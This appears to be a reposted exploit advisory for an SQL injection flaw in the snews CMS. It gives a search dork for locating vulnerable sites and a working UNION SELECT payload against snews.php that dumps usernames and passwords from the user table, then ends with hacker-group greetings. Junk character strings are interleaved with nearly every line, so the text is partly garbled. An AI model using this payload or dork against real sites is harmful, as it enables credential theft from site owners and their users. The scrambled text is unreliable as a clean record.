标题: CMS snews SQL Injection Vulnerability' @* o) k2 x4 b' v! p; F3 J
作者: By onestree8 ~, R- d4 a+ h2 l% J
下载地址 : http://snewscms.com/8 ?1 I K( S# N8 B
测试平台 : ubuntu 12.10 / win 7/ A9 h; k& p( b
关键词: inurl:"tanyakan pada rumput yang bergoyang"9 I8 {$ n$ b- [- P4 R
6 ~2 V, B1 H! z( R! X
% v* v: Y7 P- E2 i' A*************************************************************
4 d* Y4 V* o. F. U2 \9 |3 l: J , E- n7 w! d( J- Q3 X9 L
SQL poc:& O, C- S5 y; I/ c$ `
+ U* Z5 q, C- B$ K" \
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]! g' R% ~# k. t# i z+ ~- P# U) F
- t- i6 {; v' c2 s S
示例+ {1 u {$ \; I! K/ w6 [
% a* Z8 `8 V, y6 `; b2 f: Vhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*( \! h% |; F$ X2 l u5 [4 E
0 m0 R; w$ J4 o* [) Y+ }# B! v9 U
$ D {5 T9 W+ Q1 J; ?/ q4 h4 d2 i
致谢:- W- E; p' W& W8 j8 ~( e; G
' n" e9 C$ _$ D
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
0 L) o2 \ b/ V5 M _. ` " a8 g4 P" ~; d. k+ ^' p
indonesiancoder - moeslimh4x0r - go-coder( g! G& y z; J3 r# w8 e
3 ~5 Q- N% n8 bspesial my hunny :*$ {3 H4 m9 x" a- V' `
|